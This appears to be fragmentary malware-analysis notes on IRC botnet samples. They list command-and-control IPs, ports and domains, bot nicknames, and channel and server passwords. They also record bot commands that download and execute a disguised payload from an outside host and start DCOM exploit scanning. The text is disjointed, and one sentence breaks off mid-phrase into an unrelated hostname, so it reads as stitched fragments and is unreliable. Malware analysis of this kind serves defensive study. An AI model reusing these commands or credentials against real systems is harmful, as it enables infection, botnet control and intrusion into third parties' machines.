* Outgoing Connections
  o Transport Protocol: TCP
  o Remote Address: 69.65.19.125
  o Remote Port: 6667
  o Connection Established: 0
  o Socket: 44

The sample is protected with Themida to prevent it from being reverse-engineered. Themida protection can potentially be used by a threat to complicate manual threat analysis (e.g. the sample would not run under a virtual machine). A network-aware worm that uses known
msnrulz.hi5photos.us
* Outgoing Connections
  o Transport Protocol: TCP
  o Remote Address: 67.202.33.148
  o Remote Port: 1986
  o Connection Established: 0
  o Socket: 1668

dns=msnrulz.hi5photos.us DNS_TYPE_A 67.202.33.148 1idreaming.id.ohost.de DNS_TYPE_A

Nick: [00|USA|166110]
Username: XP-9269
Joined Channel: #!mh! with Password r0x
Channel Topic for Channel #!mh!: “D http://hi5gallery.com/images.php?= “
Channel Topic for Channel #!mh!: “P http://hi5-image.us/gallery.php?= “
Private Message to Channel #!mh!: “msn// Thread Activated: Sending Message.”
Private Message to
Botnet server
* Outgoing Connections
  o Transport Protocol: TCP
  o Remote Address: 66.252.26.2
  o Remote Port: 6697
  o Connection Established: 0
  o Socket: 1656
Small network
78.129.221.118:1986
Nick: [00|USA|241365]
Username: XP-9968
/j #!mh! r0x
Channel Topic “P http://images-gallery.org/view.php?=”
#!mh!: “msn// Thread Activated: Sending Message.”
#!mh!: “msn// Thread Disabled.”
[00|USA|241365]: “.login version -s”
[00|USA|241365]: “.r.getfile http://file-photos.com/pcguard.jpg c:rtz.exe 1 -s”
x2skool.plisat.de
24.117.101.117 (4244)
DNS Queries: x2skool.plisat.de
Nick: [00|USA|884551]
Username: XP-9872
Server Pass: letmein
Joined Channel: ##dR## with Password bole
bot server
122.169.201.162 (4244)
Now talking in #opers
ChanMode hub.73.com sets mode +smntSMCu
Modes On #opers +smntSMCu
Nick: [00|USA|884551]
Username: XP-9872
Server Pass: letmein
Joined Channel: ##dR## with Password bole
big botnet server
* Topic is ‘=iqkqg3njjJWmdpQbp4KNBCMBhmBEGc3ox/G4OpXHWBwl5bUISmmIP5QDkH26P+sCVI1d+R2ekq9pBoyTlf8tF9U1GmAA73JkpAaGPLj/6rCm+gJ4A6DVoAVEEC84fRlOVNOI1MMhxeEyEssZOgwnUbtxF0lH3tq7ngfQI1AGUXG6AQMgCm32fvV8fbCneNBR5jMLIj5
* Set by d3y2 on Sat Mar 14 11:54:02
* ipscan s.s.s.s dcom2 -s

looks like very private

* Connecting to 67.43.236.66 (8080)
#m #las6 #fox
Now talking in #m…
[Topic On: [ #m ] [ =2cVeeCUXeV7+PRtm7KVLCQOPFRMaKuxfunDcHuIMKPOkAphgwlq96rdMrxDjCPCxeiVFZl5 ]
[Topic By: [ d3y2 ]
[Modes On: [ #m ] [ +smntSMCu ]
mirc bots server
[mirc]
user=hExTeAm By Bo7aBtar
email=team
nick=jamal[XP]60350
anick=[XP-1359871]
host=tcteam.ath.cxSERVER:tcteam.ath.cx:2006